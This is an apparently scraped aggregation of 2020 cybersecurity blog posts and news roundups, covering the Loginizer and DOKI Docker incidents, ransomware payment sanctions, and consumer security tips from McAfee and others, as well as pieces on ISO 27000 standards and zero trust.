In 2012, Trend Micro, the International Cyber Security Protection Alliance (ICSPA) and Europol’s European Cyber Crime Centre (EC3) collaborated on a white paper that imagined the technological advances of the coming 8 years, the societal and behavioral changes they may bring and the opportunities for malfeasance they could present. As we enter the 2020s, we now have the opportunity to objectively review the project against a number of success factors.

WordPress Deploys Forced Security Update for Dangerous Bug in Popular Plugin

WordPress sites running Loginizer, one of today’s most popular WordPress plugins with an install base of over one million sites, were forcibly updated this week to Loginizer version 1.6.4. This version contained a security fix for a dangerous SQL injection bug that could have allowed hackers to take over WordPress sites running older versions of the Loginizer plugin.

Just Leave That Docker API on the Front Porch, No One Will Steal It

Recently, a new type of Linux malware named “DOKI” has been discovered exploiting publicly accessible Docker API’s hosted in all major cloud providers. The manner in which threat actors are gaining access to container environments is a previously discovered technique, but the DOKI malware is something that has not been documented until now.

Adobe Fixes 16 Critical Code-Execution Bugs Across Portfolio

Adobe has released 18 out-of-band security patches in 10 different software packages, including fixes for critical vulnerabilities that stretch across its product suite. Two of the issues are out-of-bounds read flaws, (CVE-2020-24409, CVE-2020-24410); one is an out-of-bounds write bug (CVE-2020-24411). Tran Van Khang, working with Trend Micro Zero Day Initiative, is credited for the discoveries.

US Treasury Department Ban on Ransomware Payments Puts Victims in Tough Position

This month, the US Treasury Department’s Office of Foreign Assets Control (OFAC) warned organizations making ransomware payments that they risk violating economic sanctions imposed by the government against cybercriminal groups or state-sponsored hackers. The advisory has the potential to disrupt the ransomware monetization model, but also puts victims, their insurers and incident response providers in a tough situation.

What are your thoughts on the sanctions imposed by the government against cybercriminal groups or state-sponsored hackers?  Share your thoughts in the comments below or follow me on Twitter to continue the conversation: @JonLClay.

The post This Week in Security News: Watering Hole Campaign Operation Earth Kitsune Spying on Users’ Systems and Fancy Bear Imposters Are on a Hacking Extortion Spree appeared first on .

Safeguarding Critical Infrastructure: NIST Releases Draft Cybersecurity Guidance, Develops GPS-Free Backup for Timing Systems

Taking another step toward strengthening the nation’s critical infrastructure, the National Institute of Standards and Technology (NIST) has drafted guidelines for applying its Cybersecurity Framework to critical technologies such as the Global Positioning System (GPS) that use positioning, navigation and timing (PNT) data. Part of a larger NIST effort to implement a recent Executive Order to safeguard systems that rely on PNT data, these cybersecurity guidelines accompany recent NIST efforts to provide and test a resilient timekeeping signal that is independent of GPS. Formally titled the

Affected by a Data Breach? Here Are Five Security Steps You Should Take

Five Tips to Secure Your Credit Card Data From This Recent Data Breach

Users share their personal information with companies for multiple reasons. Whether they’re checking into a hotel room, using a credit card to make a purchase at their favorite food spot, or collecting rewards points at a local coffee shop, consumers give companies more access to data than they may realize. While this can help you build relationships with your favorite vendors, what happens if their security is compromised?

Dickey’s BBQ Breach

Just this week, for example, cybercriminals were found online to be selling a batch of over three million credit card records – all from cards that were used at Dickey’s BBQ establishments over the past 13-15 months. Researchers stated that Dickey’s payment systems were likely compromised by card-stealing malware, with the highest exposure in California and Arizona. What’s more, financial institutions that have been working with the researchers stated that they have already observed a significant amount of fraud carried out with these cards.

Staying Secure in Light of Data Breaches

If you think you were affected by this breach, there are multiple steps you can take to help protect yourself from the potential side effects.

Check out the following tips if you think you may have been affected by a recent data breach, or just want to take extra precautions:

Keep an eye on your bank account

One of the most effective ways to determine whether someone is fraudulently using your credit card information is to monitor your bank statements. If you see any charges that you did not make, report it

Place a fraud alert

If you suspect that your data might have been compromised, place a fraud alert on your credit. This not only ensures that any new or recent requests undergo scrutiny, but also allows you to have extra copies of your credit report so you can check for suspicious activity.

Freeze your credit

Freezing your credit will make it impossible for criminals to take out loans or open new accounts in your name. To do this effectively, you will need to freeze your credit at each of the three major credit-reporting agencies (Equifax, TransUnion, and Experian).

Consider using identity theft protection

A solution like McAfee Identity Theft Protection will help you to monitor your accounts and alert you of any suspicious activity.

Expand your security toolbox

To use your credit card safely online to make purchases, add both a VPN and password manager into your toolbox of security solutions. A VPN keeps your shopping experience private, while a password manager helps you keep track of and protect all your online accounts. And both, luckily, come included in McAfee Total Protection.

Stay Updated

To stay updated on all things McAfee  and on top of the latest consumer and mobile security threats, follow @McAfee_Home  on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

 

The post Affected by a Data Breach? Here Are Five Security Steps You Should Take appeared first on McAfee Blogs.

Making a Difference: Global Payments

 

The PCI Security Standards Council (PCI SSC) recently announced the nomination period for the next PCI SSC Board of Advisors. The Board of Advisors represents PCI SSC Participating Organizations worldwide to ensure global industry involvement in the development of PCI Security Standards. As strategic partners, they bring industry, geographical and technical insight to PCI Council plans and projects. In this post, we talk with 2018 - 2020 PCI SSC Board of Advisor Member Stacy Hughes, Chief Information Security Officer, at Global Payments about the role of the PCI SSC Board of Advisors in shaping payment security globally.

NICE Webinar: Addressing the Cybersecurity Talent Gap at Scale – Introducing Learning and Employment Records

The PowerPoint slides used during this webinar can be downloaded here. Download the Continuing Education Units form.

Speakers:

  • Rick Torres, President and CEO, National Student Clearinghouse
  • Alex Kaplan, Global Leader, Blockchain and AI for Industry Credentials, IBM Talent and Transformation
  • Darin R. Hobbs, Director of Academic Records & Credentials, Western Governors University
  • Frank C. Cicio Jr., CEO and Founder, iQ4

Synopsis: We are living in a skills-based economy where employers are seeking ways for learners (employees, job seekers, and students) to provide evidence of their skills or competencies

Election 2020: Make Sure Your Voice is Heard with These Tips

Election 2020: Make Sure Your Voice is Heard with These Tips & Best Practices

Last year, India exercised one of the greatest feats of democracy, trying to enable over 900 million people to vote in their general election. My mom lives in India, and I remember talking with her about their ambitious plans to reach every voter, no matter how remote their location. They sent poll workers deep into the jungle, and across rivers, to reach just a handful of voters. The result: a record turnout at over 67%.

In the United States, we too have an opportunity to fulfill our civic duties, with various options available to us to make sure our votes are heard. While many people are choosing to mail in their votes for the very first time, there’s also a lot of confusion around election rules and security, not to mention a flood of misinformation online to be wary of.

Here at McAfee, we want to help you vote with confidence in this critical election. That’s why we’ve put together a number of tools, resources, and best practices to empower voters. Our hope is that every voice can be heard.

Demystifying Mail-In Voting

Let’s start with some questions you may have around mail-in voting, since twice as many people plan to mail in their ballots this year, compared to 2016. Of course, with the COVID-19 pandemic still active, it’s understandable that many people, especially the vulnerable, would prefer to mail their ballot, rather than go to a polling station. I personally got my mail-in ballot and am ready to mail it this week. If you haven’t decided on how to vote, you still have time to decide.

To get accurate information on mail-in voting, go directly to your state and local websites for guidance, including how to fill out your ballot, and when to turn it in. Rules vary state to state, but one thing we do know is that mail-in voting has proven to be a reliable and secure way to have your voice heard.

It’s great to see long lines to vote in some states already. If you are still concerned about election security and online scams, my colleague Judith Bitterli has written a great guide for locating reliable sources and protecting your vote (Key tip: always look for a .gov domain name).

She also has advice for making sure that your mail-in ballot counts.

Safe Election Surfing

When looking online for election resources, be aware that scammers and cybercriminals are always trying to take advantage of trending topics to misdirect users to dangerous websites and links. In fact, the FBI recently warned that bad actors have been setting up fake election websites, in an attempt to steal voters’ personal information, or get them to download dangerous files.

The Bureau suggests that you visit the U.S. Election Assistance Commission website for accurate information in a variety of languages. If you are concerned about clicking on risky links during the election or year-round, one smart action you can take is to install McAfee WebAdvisor, which warns you of risky sites before you click on them.

Although it can be tempting to believe election information posted on social media, especially by friends and family members, know that business school MIT Sloan says “fake news is at its peak” during online presidential years, and even your loved ones can be fooled.

But whether information is clickbait, or legitimate, it can still be posted to risky websites designed to steal your information, or download malware. That’s why McAfee released a new social media protection tool as part of WebAdvisor. Using color codes, the tool shows you which links are safe or risky right in your social feed, and can be used across all six major social media platforms. This makes it easier to avoid dangerous links posted on social channels. Given the increase in phishing we’ve observed in the last few months across PC and mobile platforms, a comprehensive security solution like McAfee® Total Protection can help keep your personal information and devices safe.

In-Person Voting

If you still plan to vote in person, or even better, volunteer as a poll worker, make sure that you have reliable information on voting times and locations. You’ll probably also want to look into local rules on health and safety precautions, so you are well prepared.

False and misleading information about COVID-19 has been swirling since the start of the pandemic, so it’s important that you seek verified information about the virus. Here again are some great tips from Judith on how to keep COVID misinformation from suppressing your vote.

Exercise Your Right

Now that you know how to sidestep misinformation, find trusted resources, and plan your vote, either through the mail or in person, I hope that you will exercise your right, with confidence.

The post Election 2020: Make Sure Your Voice is Heard with These Tips appeared first on McAfee Blogs.

Cybersecurity 101: How to Protect Yourself from Hackers

The internet has changed a lot of things; some for the better and others for the worse. Everything that we use in our homes, from mobile devices to Internet of Things (IoT) products, relies on the internet. The extensive use of these products has the potential to erode our privacy. When it comes to privacy, it is under attack from all sides. Whether we realize it or not, hackers are always trying to gain information about us so that they can control our lives. In order to make your devices, online identity, and everything that you do online more secure, you have to follow a few things. In this article, I am going to highlight five cybersecurity tips that you need to know.

Install an Antivirus

The first thing you have to do is make use of an antivirus that will protect you against malicious programs. With so many different kinds of viruses and malware, you need to ensure that you prevent these attacks. Once you have installed antivirus, update it regularly so that its security patch is fool-proof. However, installing an antivirus doesn’t mean that you can browse any site you want to. You will still have to be very careful as hackers can still find ways to get into your system.

Use Unique Passwords for Login

One of the easiest and most prevalent ways hackers get access to your information is by getting hold of your passwords. You must use a unique password for different platforms so that even if one account gets hacked, the hacker can’t access the rest of your accounts. Moreover, you should use a strong password for every account that contains a combination of numbers, upper-case and lower-case letters, special signs, etc. Every little thing that you do to make your password more secure goes a long way.

Get a VPN and Use It

You might have heard about using a VPN when browsing the internet, but most people don’t fully understand what a VPN does. Say that you go to a coffee shop and want to connect to its Wi-Fi. You can never be sure that the network you are using is secure. Whether you are using your home network or a public network, someone can easily steal data from your computer if he bypasses your network security. The best way to prevent that is by using a VPN as it encrypts all your data. Here are some best value VPNs that you can use to secure your computer files.

Use Two Factor Authentication

While I agree that using two-factor authentication can take a lot of time, let me tell you that it is worth it. Two-factor authentication adds an extra layer of security in case someone bypasses the first one. For example, even if the hacker gets access to your password, he will never be able to access your account without bypassing the second level of authentication.

Protect Your Social Media Privacy

Last but not least, you have to pay some attention to how you use social media. Social media scams are at their peak nowadays as hackers fish for information through these platforms. You have to be extremely careful when using platforms like Facebook, as you voluntarily give out your information and present it publicly. Make sure that you have configured every social media platform and think twice before revealing any personal information. Once you give out your personal information yourself, you can’t blame anyone but yourself. After all, regardless of how many security protocols we put into place, the weakest link in the security chain is humans themselves.

The post Cybersecurity 101: How to Protect Yourself from Hackers appeared first on CyberDB.

5G and the IoT: A Look Ahead at What’s Next for Your Home and Community

October is Cybersecurity Awareness Month, which is led by the U.S. government’s Cybersecurity and Infrastructure Security Agency (CISA) in conjunction with the National Cyber Security Alliance (NCSA)—a national non-profit focused on cybersecurity education & awareness. McAfee is pleased to announce that we’re a proud participant.

Imagine it’s 20 years ago and someone at a dinner party predicts that one day you could pop down to the appliance store and buy an internet-connected fridge. Your year 2000 self might have shaken that off and then asked, “Why would someone ever do that?”

Yet here we are.

Today, so much is getting connected. Our appliances, security systems, and even our coffeemakers too. So far this month, we’ve talked about protecting these connected things and securing these new digital frontiers as Internet of Things (IoT) devices transform not only our homes, but businesses and communities as well.

To wrap up Cybersecurity Awareness Month, let’s take a look ahead at how the next wave of connected devices could take shape by taking a look at the network that billions of them will find themselves on: 5G networks.

5G is the key

You’ve no doubt seen plenty of commercials from the big mobile carriers as they tout the rollout of their new, more powerful 5G networks. And more powerful they are. For starters, 5G is expected to operate roughly 10 times faster than the 4G LTE networks many of us enjoy now—with the potential to get yet faster than that over time.

While mention of faster speeds continues to be the top selling point in ads and the like, 5G offers another pair of big benefits: greater bandwidth and lower latency. Taken together, that means 5G networks can host more devices than before and with a near-instantaneous response time.

The implication of these advances is that billions and billions of new devices will connect to mobile networks directly, at terrific speeds, rather than to Wi-Fi networks. Of those, many billions will be IoT devices. And that means more than just phones.

What will those devices look like?

One answer is plenty more of what we’re already starting to see today—such as commercial and industrial devices that track fleet vehicles, open locks on tractor trailer deliveries based on location, monitor heating and air conditioning systems, oversee supply chains. We’ll also see more devices that manage traffic, meter utilities, and connect devices used in healthcare, energy, and agriculture. That’s in addition to the ones we’ll own ourselves, like wearables and even IoT tech in our cars.

All together, we’ll add about 15 billion new IoT devices to the 26 billion IoT devices already in play today for a total of an expected 41 billion IoT devices in 2025.

Securing 5G and the IoT

Citing those examples of IoT applications underscores the critical need for safety and security in the new 5G networks. This is a network we will count on in numerous ways. Businesses will trust their operations to the IoT devices that operate on it. Cities will run their infrastructure on 5G IoT devices. And we, as people, will use 5G networks for everything from entertainment to healthcare. Not only will IoT devices themselves need protection, but the networks will need to be hardened as well. And you can be certain that increased network security, and security in general, is a part of our future forecast.

The GSMA, an industry group representing more than 750 operators in the mobile space, calls out the inherent need for security for 5G networks in their 5G Reference Guide for Operators. In their words, “New threats will be developed as attackers are provided live service environment to develop their techniques. 5G is the first generation that recognizes this threat and has security at its foundation.” When you consider the multitude of devices and the multitude of applications that will find their way onto 5G, a “square one” emphasis on security makes absolute sense. It’s a must.

While standards and architectures are taking shape and in their first stages of implementation, we can expect operators to put even more stringent defenses in place, like improved encryption, ways of authenticating devices to ensure they’re not malicious, creating secure “slices” of the network, and more, which can all improve security.

Another consideration for security beyond the oncoming flood of emerging devices and services that’ll find their way onto 5G networks is the sheer volume of traffic and data they’ll generate. One estimate puts that figure of 5G traffic at 79.4 zettabytes (ZB) of data in 2025. (What’s a zettabyte? Imagine a 10 followed by 21 zeroes.) This will call for an evolution in security that makes further use of machine learning and AI to curb a similarly increased volume of threats—with technologies much like you see in our McAfee security products today.

The newest IoT devices making their way into your home

“Siri/Alexa/Cortana/Google, play Neko Case I Wish I Was the Moon.”

We’ve all gotten increasingly comfy with the idea of connected devices in our homes, like our smart assistants. Just in 2018, Juniper Research estimated that there’d be some 8 billion digital voice assistants globally by 2023, thanks in large part to things like smart TVs and other devices for the home. Expect to see more IoT devices like those available for use in and around your house.

What shape and form might they take? Aside from the voice-activated variety, plenty of IoT devices will help us automate our homes more and more. For example, you might have smart sensors in your garden that can tell when your tomatoes are thirsty and activate your soaker hoses for a drink—or other smart sensors placed near your water heater that will text you when they detect a leak.

Beyond that, we’re already purchasing connected lights and smart thermostats, yet how about connecting these things all together to create presets for your home? Imagine a setting called “Movie Night,” where just a simple voice command draws the shades, lowers the lights, turns on the gas fireplace, and fires up the popcorn maker. All you need to do is get your slippers.

Next, add in a degree of household AI, which can learn your preferences and habits. Aspects of your home may run themselves and predict things for you, like the fact that you like your coffee piping hot at 5:30am on Tuesdays. Your connected coffeemaker will have it ready for you.

These scenarios were once purely of the George Jetson variety (remember him?), yet more and more people will get to indulge in these comforts and conveniences as the technology becomes more pervasive and affordable.

Technology for All

One point of consideration with any emerging technology like the IoT on 5G is access.

This year drove home a hard reality: access to high-speed internet, whether via mobile device or a home network, is no longer a luxury. It’s a utility. Like running water. We need it to work. We need it to study. We need it to bank, shop, and simply get things done.

Yet people in underserved and rural communities in the U.S. still have no access to broadband internet in their homes. Nearly 6 in 10 of U.S. parents with lower incomes say their child may face digital obstacles in schoolwork because of reduced access to devices and quality internet service. And I’ve heard anecdotes from educators about kids taking classes online who have to pull into their school’s parking lot to get proper Wi-Fi, simply because they don’t have a quality connection at home.

The point is this: as these IoT innovations continue to knit their way into our lives and the way the world works, we can’t forget that there’s still a digital divide that will take years of effort, investment, and development before that gap gets closed. And I see us closing that gap in partnership, as people and communities, businesses and governments, all stand to benefit when access to technology increases.

So as we look to the future, my hope is that we all come to see high-speed internet connections for what they are—an absolute essential—and take the steps needed to deliver on it. That’s an advance I’d truly embrace.

The post 5G and the IoT: A Look Ahead at What’s Next for Your Home and Community appeared first on McAfee Blogs.

Data-Centric Security for the Cloud, Zero Trust or Advanced Adaptive Trust?

Over the last few months, Zero Trust Architecture (ZTA) conversations have been top-of-mind across the DoD. We have been hearing the chatter during industry events all while sharing conflicting interpretations and using various definitions. In a sense, there is an uncertainty around how the security model can and should work. From the chatter, one thing is clear – we need more time. Time to settle in on just how quickly mission owners can classify a comprehensive and all-inclusive, acceptable definition of Zero Trust Architecture.

Today, most entities utilize a multi-phased security approach. Most commonly, the foundation (or first step) in the approach is to implement secure access to confidential resources. Coupled with the shift to remote and distance work, the question arises, “are my resources and data safe, and are they safe in the cloud?”

Thankfully, the DoD is in the process of developing a long-term strategy for ZTA. Industry partners, like McAfee, have been briefed along the way. It has been refreshing to see the DoD take the initial steps to clearly define what ZTA is, what security objectives it must meet, and the best approach for implementation in the real-world. A recent DoD briefing states “ZTA is a data-centric security model that eliminates the idea of trusted or untrusted networks, devices, personas, or processes and shifts to a multi-attribute based confidence levels that enable authentication and authorization policies under the concept of least privilege access”.

What stands out to me is the data-centric approach to ZTA. Let us explore this concept a bit further. Conditional access to resources (such as network and data) is a well-recognized challenge. In fact, there are several approaches to solving it, whether the end goal is to limit access or simply segment access. The tougher question we need to ask (and ultimately answer) is how do we limit contextual access to cloud assets? What data security models should we consider when our traditional security tools and methods do not provide adequate monitoring? And is securing data, or at least watching user behavior, enough when the data stays within multiple cloud infrastructures or transfers from one cloud environment to another?

Increased usage of collaboration tools like Microsoft 365 and Teams, Slack, and WebEx offers easily relatable examples of data moving from one cloud environment to another. The challenge with this type of data exchange is that the data flows stay within the cloud using an East-West traffic model. Similarly, would you know if sensitive information created directly in Office 365 is uploaded to a different cloud service? Collaboration tools by design encourage sharing data in real time between trusted internal users and, more recently with telework, even external or guest users. Take for example a supply chain partner collaborating with an end user. Trust and conditional access potentially create a risk to both parties, inside and outside of their respective organizational boundaries. A data breach, whether intentional or not, can easily occur because of the pre-established trust and access. There are few to no default protection capabilities preventing this situation from occurring without intentional design. Data loss protection, activity monitoring and rights management all come into question. Clearly, new data governance models, tools and policy enforcement capabilities for this simple collaboration example are required to meet the full objectives of ZTA.

So, as the communities of interest continue to refine the definitions of Zero Trust Architecture based upon deployment, usage, and experience, I believe we will find ourselves shifting from a Zero Trust model to an Advanced Adaptive Trust model. Our experience with multi-attribute-based confidence levels will evolve and so will our thinking around trust and data-centric security models in the cloud.

 

 

The post Data-Centric Security for the Cloud, Zero Trust or Advanced Adaptive Trust? appeared first on McAfee Blogs.

Seven Tips for Protecting Your Internet-Connected Healthcare Devices

October is Cybersecurity Awareness Month, which is led by the U.S. government’s Cybersecurity and Infrastructure Security Agency (CISA) in conjunction with the National Cyber Security Alliance (NCSA)—a national non-profit focused on cybersecurity education & awareness. McAfee is pleased to announce that we’re a proud participant.

Fitness trackers worn on the wrist, glucose monitors that test blood sugar without a prick, and connected toothbrushes that let you know when you’ve missed a spot—welcome to internet-connected healthcare. It’s a new realm of care with breakthroughs big and small. Some you’ll find in your home, some you’ll find inside your doctor’s office, yet all of them are connected. Which means they all need to be protected. After all, they’re not tracking any old data. They’re tracking our health data, one of the most precious things we own.

What is internet-connected healthcare?

Internet-connected healthcare, also known as connected medicine, is a broad topic. On the consumer side, it covers everything from smart watches that track health data to wireless blood pressure monitors that you can use at home. On the practitioner side, it accounts for technologies ranging from electronic patient records, network-enabled diagnostic devices, remote patient monitoring in the form of wearable devices, apps for therapy, and even small cameras that can be swallowed in the form of a pill to get a view of a patient’s digestive system.

Additionally, it also includes telemedicine visits, where you can get a medical issue diagnosed and treated remotely via your smartphone or computer by way of a video conference or a healthcare provider’s portal—which you can read about more in one of my blogs from earlier this year. In all, big digital changes are taking place in healthcare—a transformation that’s rapidly taking shape to the tune of a global market expected to top USD 534.3 billion by 2025.

Privacy and security in internet-connected healthcare

Advances in digital healthcare have come more slowly compared to other aspects of our lives, such as consumer devices like phones and tablets. Security is a top reason why. Not only must a healthcare device go through a rigorous design and approval process to ensure it’s safe, sound, and effective, it is also held to similarly rigorous degrees of regulation when it comes to medical data privacy. For example, in the U.S., we have the Health Insurance Portability and Accountability Act of 1996 (HIPAA), which sets privacy and security standards for certain health information.

Taken together, this requires additional development time for any connected medical device or solution, in addition to the time it takes to develop one with the proper efficacy. Healthcare device manufacturers cannot simply move as quickly as, say, a smartphone manufacturer can. And rightfully so.

Seven tips for protecting your internet-connected healthcare devices

However, for this blog, we’ll focus on the home and personal side of the equation, with devices like fitness trackers, glucose monitors, smart watches, and wearable devices in general—connected healthcare devices that more and more of us are purchasing on our own. To be clear, while these devices may not always be categorized as healthcare devices in the strictest (and regulatory) sense, they are gathering your health data, which you should absolutely protect. Here are some straightforward steps you can take:

1) First up, protect your phone

Many medical IoT devices use a smartphone as an interface, and as a means of gathering, storing, and sharing health data. So whether you’re an Android owner or iOS owner, get security software installed on your phone so you can protect all the things it accesses and controls. Additionally, installing it will protect you and your phone in general as well.

2) Set strong, unique passwords for your medical IoT devices

Some IoT devices have found themselves open to attack because they come with a default username and password—which are often published on the internet. When you purchase any IoT device, set a fresh password using a strong method of password creation. And keep those passwords safe. Instead of keeping them on a notebook or on sticky notes, consider using a password manager.

3) Use two-factor authentication

You’ve probably come across two-factor authentication while banking, shopping, or logging into any other number of accounts. Using a combination of your username, password, and a security code sent to another device you own (typically a mobile phone) makes it tougher for hackers to crack your device. If your IoT device supports two-factor authentication, use it for extra security.

4) Update your devices regularly

This is vital. Make sure you have the latest updates so that you get the latest functionality from your device. Equally important is that updates often contain security upgrades. If you can set your device to receive automatic updates, do so.

5) Secure your internet router

Your medical IoT device will invariably use your home Wi-Fi network to connect to the internet, just like your other devices. All the data that travels on it is already personal and private, and that goes double for any health data that passes along it. Make sure you use a strong and unique password. Also change the name of your router so it doesn’t give away your address or identity. One more step is to check that your router is using an encryption method, like WPA2, which will keep your signal secure. You may also want to consider investing in an advanced internet router that has built-in protection, which can secure and monitor any device that connects to your network.

6) Use a VPN and a comprehensive security solution

Similar to the above, another way you can further protect the health data you send over the internet is to use a virtual private network, or VPN. A VPN uses an encrypted connection to send and receive data, which shields it from prying eyes. A hacker attempting to eavesdrop on your session will effectively see a mish-mash of garbage data, which helps keep your health data secure.

7) When purchasing, do your research

One recent study found that 25% of U.S. homeowners with broadband internet expect to purchase a new connected consumer health or fitness device within the next year. Just be sure yours is secure. Read up on reviews and comments about the devices you’re interested in, along with news articles about their manufacturers. See what their track record is on security, such as if they’ve exposed data or otherwise left their users open to attack.

Take care of your health, and your health data

Bottom line, when we speak of connected healthcare, we’re ultimately speaking about one of the most personal things you own: your health data. That’s what’s being collected. And that’s what’s being transmitted by your home network. Take these extra measures to protect your devices, data, and yourself as you enjoy the benefits of the connected care you bring into your life and home.

The post Seven Tips for Protecting Your Internet-Connected Healthcare Devices appeared first on McAfee Blogs.

The Best Anti-Malware Software in 2020

With the rising digital insecurity in 2020, it is necessary to use the best anti-malware software or seek an alternative. Here’s the reason:

The onset of the fourth industrial revolution has seen work and other business activities switch operations to the online market. Sadly, most of these tech consumers have little knowledge of ‘staying safe online’.

Hackers and other malware developers are taking advantage of this to promote cyberbullying, online scams, and other sorts of crimes. You need enlightenment to evade such threats. A typical solution is to use anti-malware software. However, there’s a catch:

As anti-malware companies seek to secure their customers, developers of malware up their game to override the security systems.

Does this mean anti-malware technology is dead or alive? Are you helpless? No. Here are anti-malware options to try. To see which anti-malware software is the best, and to make it simpler to settle on a particular product, read on to find out the ranking parameters.

Norton is the best anti-malware software in 2020 because it has the most updated security and best user experience. What are its features? What are its alternatives? Let’s take a deep dive below.

Parameters for Ranking the Best Anti-Malware Software in 2020

Due to the demand for a better user experience, 2020 demands extra features besides security. These include:

Detection Time

As a consumer of the gig economy, your computer usage revolves around browsing the internet, downloading, and sharing files. This calls for real-time malware detection. Real-time detection simply means ‘detect malware and react immediately’.

The anti-malware tracks the websites and links you visit. It scans the links before you click them. Whenever it detects ‘danger’, it stops your browser from communicating with the threats.

The simultaneous reaction is a huge improvement on the former culture of waiting for the malware to access the sensitive files on your computer, then notifying you or trying to fight malware that is already interfering with your sensitive documents.

Password Management

Since every hacker attacks your files for some gain, most malware strives to grab your passwords for two reasons. First, the password is a gateway to sensitive files. Secondly, the password unlocks your bank accounts and credit cards.

To boost storage and browsing confidence, Norton 360 and other world-class anti-malware take the responsibility of managing your passwords.

Cloud Backups

To improve security, the best anti-malware ensures everything occurs at lightning speeds. Instead of using local storage, companies utilize the efficiency and security of cloud storage.

They are, then, faster at identifying malware and feeding the data to cloud servers. The data retrieval process also happens at the speed of light.

They proceed to back up your internal files with the cloud databases. In case of a severe malware attack, you can retrieve your sensitive files from the cloud version. 

Works in Various Environments

The best anti-malware software for 2020 works on many types of devices and operating systems. Examples of typical operating systems are macOS, Windows, iOS, and Android.

Again, it does deep scanning of the system for a variety of malware. Examples of malware are trojan horses, spyware, worms, and viruses.

Lightweight

2020 demands an anti-malware software that allows your computer to load sites faster. This calls for consuming less of your computer’s memory. Reason?

With the fast-paced gig economy, product consumers, employers, and most clients need immediate feedback. Consequently, it is useless to have an anti-malware that is ruthless with malware but slows your computer speed.

To speed up the machine, anti-malware software like Avira has in-system acceleration tools to propel your computer’s speed.

Other Services?

Norton 360, as the best anti-malware software in the market, has the best user experience and VPN technology. It has one of the easiest-to-navigate user interfaces.

To take the lead in anti-malware ranking, it has boosted its customer support system. You get timely and detailed email replies when you seek help. To improve the user experience, they offer VPN services, enabling you to access censored networks.

Other Anti-Malwares to Consider

You can also take a look at Malwarebytes. Its premium version gives you an ocean of benefits, typical for protection in 2020. Alternatively, check Kaspersky and Avira anti-malware.

Conclusion

For all-in-one malware protection, check out Norton 360 anti-malware software. Alternatively, consider Malwarebytes, Kaspersky, and Avira anti-malware software.

The software gives you the best security, usability, and a world-class support system. More importantly, Norton 360 adjusts quickly to the changing malware forms.

The post The Best Anti-Malware Software in 2020 appeared first on CyberDB.

What is the ISO 27000 series of standards?

The ISO/IEC 27001 family of standards, also known as the ISO 27000 series, is a series of best practices to help organisations improve their information security.

Published by ISO (the International Organization for Standardization) and the IEC (International Electrotechnical Commission), the series explains how to implement best-practice information security practices.

It does this by setting out ISMS (information security management system) requirements.

An ISMS is a systematic approach to risk management, containing measures that address the three pillars of information security: people, processes and technology.

The series consists of 46 individual standards, including ISO 27000, which provides an introduction to the family as well as clarifying key terms and definitions.

You don’t need a comprehensive understanding of ISO standards to see how the series works, and some won’t be relevant to your organisation, but there are a few core ones that you should be familiar with.

ISO 27001

This is the central standard in the ISO 27000 series, containing the implementation requirements for an ISMS.

This is important to remember, as ISO/IEC 27001:2013 is the only standard in the series that organisations can be audited and certified against.

That’s because it contains an overview of everything you must do to achieve compliance, which is expanded upon in each of the following standards.

ISO 27002

This is a supplementary standard that provides an overview of information security controls that organisations might choose to implement.

Organisations are only required to adopt controls that they deem relevant – something that will become apparent during a risk assessment.

The controls are outlined in Annex A of ISO 27001, but whereas this is essentially a quick rundown, ISO 27002 contains a more comprehensive overview, explaining how each control works, what its objective is and how you can implement it.

ISO 27017 and ISO 27018

These supplementary ISO standards were introduced in 2015, explaining how organisations should protect sensitive information in the Cloud.

This has become especially important recently as organisations migrate much of their sensitive information on to online servers.

ISO 27017 is a code of practice for information security, providing extra information about how to apply the Annex A controls to information stored in the Cloud.

Under ISO 27001, you have the choice to treat these as a separate set of controls. So, you’d pick a set of controls from Annex A for your ‘normal’ data and a set of controls from ISO 27017 for data in the Cloud.

ISO 27018 works in essentially the same way but with extra consideration for personal data.

ISO 27701

This is the newest standard in the ISO 27000 series, covering what organisations must do when implementing a PIMS (privacy information management system).

It was created in response to the GDPR (General Data Protection Regulation), which instructs organisations to adopt “appropriate technical and organisational measures” to protect personal data but doesn’t state how they should do that.

ISO 27701 fills that gap, essentially bolting privacy processing controls onto ISO 27001.

Why use an ISO 27000-series standard?

Data breaches are one of the biggest information security risks that organisations face. Sensitive data is used across all areas of businesses these days, increasing its value for legitimate and illegitimate use.

Countless incidents occur every month, whether it’s cyber criminals hacking into a database or employees losing or misappropriating information. Wherever the data goes, the financial and reputational damage caused by a breach can be devastating.

That’s why organisations are increasingly investing heavily in their defences, using ISO 27001 as a guideline for effective security.

ISO 27001 can be applied to organisations of any size and in any sector, and the framework’s broadness means its implementation will always be appropriate to the size of the business.

You can find out how to get started with the Standard by reading Information Security & ISO 27001: An introduction.

This free green paper explains:

  • What ISO 27001 is, how an ISMS works and how it relates to ISO 9001, ISO 27002 and other standards;
  • The importance of risk assessments and risk treatment plans;
  • How the Standard helps you meet your legal and regulatory obligations; and
  • Your audit and certification requirements.

A version of this blog was originally published on 10 October 2019.

The post What is the ISO 27000 series of standards? appeared first on IT Governance UK Blog.

Watch Here: How to Build a Successful AppSec Program

Cyberattackers and threat actors won’t take a break and wait for you to challenge them with your security efforts – you need a proactive application security (AppSec) program to get ahead of threats and remediate flaws quickly. It’s critical that you stand up an AppSec program covering all the bases, from which roles each team member will have to alignment on KPIs and goals, and even a detailed application inventory to stay on top of your code.

But it isn’t enough to simply set ground rules and define your goals; good AppSec programs succeed because they come from the top-down, with stakeholders committed at the executive level. This helps maintain accountability and ensures that developers and security professionals are aligned when it comes to targets for flaw remediation. Part of that effort involves standing up a Security Champions program, too, enabling your developers to work alongside security and take ownership over securing their code.

If you follow these and other recommendations, your AppSec program should run like a well-oiled machine with the flexibility and security you need to keep creating innovative applications. Watch this video to learn about what goes into building a successful AppSec program, and check out the full How-to Series here.

This Week in Security News: Cybercriminals Use Stolen Data and Hacking Tools as Prizes in Poker Games and Rap Battles and VirusTotal Now Supports Trend Micro ELF Hash

Welcome to our weekly roundup, where we share what you need to know about the cybersecurity news and events that happened over the past few days. This week, learn about how cybercriminals are passing the time during the COVID-19 pandemic with online poker games, where the prizes include stolen data. Also, read about how VirusTotal now supports Trend Micro ELF Hash (aka telfhash).

 

Read on:

Cybercriminals Use Stolen Data and Hacking Tools as Prizes in Poker Games and Rap Battles

Cybercriminals have put their own spin on passing time during the COVID-19 lockdown with online rap battles, poker tournaments, poem contests, and in-person sport tournaments. The twist is that the prize for winning these competitions is sometimes stolen data and tools to make cybercrime easier, according to new research from Trend Micro.

Becoming an Advocate for Gender Diversity: Five Steps that Could Shape Your Journey

